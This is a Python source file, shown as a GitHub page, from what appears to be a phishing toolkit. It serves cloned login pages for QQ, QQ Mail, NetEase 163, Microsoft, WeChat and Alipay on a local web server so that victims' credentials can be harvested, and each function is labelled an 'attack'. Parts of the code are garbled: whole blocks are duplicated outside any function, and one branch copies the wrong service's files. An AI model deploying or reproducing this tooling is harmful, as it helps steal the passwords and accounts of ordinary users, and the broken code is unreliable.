-
Notifications
You must be signed in to change notification settings - Fork 1
/
socialattack.py
239 lines (218 loc) · 7.09 KB
/
socialattack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
def lang():
import os
openlang = open ("config/lang" , "r+")
readlang = openlang.read()
if readlang == "zh-cn": #the language is chinese
language = "true"
print(language)
print("操作系统内核:"+os.name)
else: #the language is english
language = "false"
print(language)
print("Options System:"+os.name)
def socialqqattack():
import os
lang()
def oschose():
if os.name == "posix":
#Linux
os.system("cp qq/index.html ./") #copy file to the root content
os.system("cp qq/index.js ./")
os.system("cp qq/qqlogon.jpg ./")
os.system ("python3 -m http.server 8080")
if os.name == "nt":
#windows
os.system ("python -m http.server 8080")
else:
print("[*]Do no start a http port on your system!")
oschose()
import social as social
social.socialtools()
def delfilelinux(): #use linux command to delete file
import os
os.system("rm -f index.html")
os.system("rm -f index.js")
def delfilewin(): #use windows cmd to delete file
import os
os.system("del /F /S /Q index.html")
os.system("del /F /S /Q index.js")
def qqmail():
import os
lang()
#qq mail attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp qqmail/index.html ./") #copy file to the root content
os.system("cp qqmail/index.js ./")
os.system("cp qqmail/logo.jpeg ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy qqmail/index.html ./") #use cmd command
os.system("copy qqmail/index.js ./")
os.system("copy qqmail/logo.jpeg ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
def netease():
import os
lang()
#qq mail attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp 163/index.html ./") #copy file to the root content
os.system("cp 163/index.js ./")
os.system("cp 163/logo.jpeg ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy 163/index.html ./") #use cmd command
os.system("copy 163/index.js ./")
os.system("copy 163/logo.jpeg ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
import os
lang()
#qq mail attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp 163/index.html ./") #copy file to the root content
os.system("cp 163/index.js ./")
os.system("cp 163/logo.jpeg ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy 163/index.html ./") #use cmd command
os.system("copy 163/index.js ./")
os.system("copy 163/logo.jpeg ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
def microsoftattack():
import os
lang()
#Microsoft Attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp Microsoft/index.html ./") #copy file to the root content
os.system("cp Microsoft/index.js ./")
os.system("cp Microsoft/pass.html ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy Microsoft/index.html ./") #use cmd command
os.system("copy Microsoft/index.js ./")
os.system("copy Microsoft/pass.html ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
import os
lang()
#qq mail attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp 163/index.html ./") #copy file to the root content
os.system("cp 163/index.js ./")
os.system("cp 163/logo.jpeg ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy 163/index.html ./") #use cmd command
os.system("copy 163/index.js ./")
os.system("copy 163/logo.jpeg ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
def wechat():
import os
lang()
#wechat attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp wechat/index.html ./") #copy file to the root content
os.system("cp wechat/index.js ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy wechat/index.html ./") #use cmd command
os.system("copy wechat/index.js ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()
def alipay():
import os
lang()
#alipay attack
if os.name == "posix":
#Linux
delfilelinux()
os.system("cp alipay/index.html ./") #copy file to the root content
os.system("cp alipay/index.js ./")
os.system("cp alipay/pass.PNG ./")
os.system("cp alipay/users.PNG ./")
os.system ("python3 -m http.server 8080")
import social as social
social.socialtools()
if os.name == "nt":
#windows
delfilewin()
os.system("copy wechat/index.html ./") #use cmd command
os.system("copy wechat/index.js ./")
os.system("copy alipay/pass.PNG ./")
os.system("copy alipay/users.PNG ./")
os.system ("python -m http.server 8080")
import social as social
social.socialtools()
else:
print("[*]Do no start a http port on your system!")
import social as social
social.socialtools()